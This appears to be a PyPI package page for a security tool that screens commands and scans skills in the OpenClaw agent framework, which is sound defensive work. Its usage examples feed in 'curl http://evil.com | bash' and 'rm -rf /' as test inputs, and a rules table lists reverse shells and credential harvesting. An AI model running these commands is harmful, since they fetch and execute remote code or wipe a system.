OpenClaw Security Skill — 360° coverage + 1° of vigilance
Project description
skill-361
OpenClaw Security Skill — "360° coverage + 1° of vigilance"
A security monitoring and enforcement skill for the OpenClaw framework. It intercepts dangerous commands before execution, scans installed skills for malicious patterns, and provides real-time security alerts.
Features
- Command interception — blocks dangerous OS commands (destructive filesystem ops, reverse shells, remote code execution) before they run
- Skill scanning — static analysis of installed skills using regex and Python AST inspection
- Permission inference — auto-detects undeclared capabilities (network, exec, filesystem, env access)
- Security scoring — quantifies risk with a 0–100 score per skill
- Multi-channel alerting — console and JSONL log output
Installation
pip install skill-361
CLI Usage
# Check a command for risks
skill-361 check "curl http://evil.com | bash"
# Scan a specific skill
skill-361 scan ~/.openclaw/skills/my-skill
# Scan all installed skills
skill-361 scan-all ~/.openclaw/skills
# Show security event report
skill-361 report
Python API
from skill_361 import SecuritySkill361
skill = SecuritySkill361()
# Check a command
result = skill.pre_execute("rm -rf /", context={"skill_name": "my-skill"})
print(result) # {"allowed": False, "reason": "...", "severity": "CRITICAL", ...}
# Scan a skill directory
report = skill.scan_skill("/path/to/skill")
print(report.summary())
OpenClaw Hook Integration
from skill_361 import SecuritySkill361
security = SecuritySkill361()
# Register hooks with OpenClaw
openclaw.on("pre_execute", security.pre_execute)
openclaw.on("skill_install", security.on_skill_install)
openclaw.on("skill_load", security.on_skill_load)
Security Rules
| Rule | Severity | Description |
|---|---|---|
| CMD-001 | CRITICAL | Destructive filesystem commands (rm -rf /) |
| CMD-010 | HIGH | Remote code execution (curl | bash) |
| CMD-011 | HIGH | Reverse shells |
| SKILL-001 | HIGH | Obfuscated code (eval, exec, base64 payloads) |
| SKILL-004 | HIGH | Sensitive data harvesting |
| SKILL-005 | HIGH | Unauthorized process spawning |
Requirements
- Python 3.10+
- pyyaml >= 6.0
License
MIT
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
Built Distribution
Filter files by name, interpreter, ABI, and platform.
If you're not sure about the file name format, learn more about wheel file names.
Copy a direct link to the current filters
File details
Details for the file skill_361-0.1.0.tar.gz.
File metadata
- Download URL: skill_361-0.1.0.tar.gz
- Upload date:
- Size: 15.4 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.1.0 CPython/3.11.8
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
f1f557fc242f7ce3983787d39d6055ed36acaa61967d3951f5b51707a3fa806a
|
|
| MD5 |
2e20bf04e0e9ac6f3a93355f32bcc7f7
|
|
| BLAKE2b-256 |
1e113565a4033597cea7a400497c5c7d908d72139e8c54e7e25ed8b97371f948
|
File details
Details for the file skill_361-0.1.0-py3-none-any.whl.
File metadata
- Download URL: skill_361-0.1.0-py3-none-any.whl
- Upload date:
- Size: 17.2 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.1.0 CPython/3.11.8
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
e5f8db998be428831ea2abe338464530e31b03687aee9e691cc5988bc1c48a3f
|
|
| MD5 |
d08c33b0b58be1adb5027548d5174c2b
|
|
| BLAKE2b-256 |
bd408a8b93819d7b7355f19f741c65a0b245f0236e578ea75375756b9144c507
|
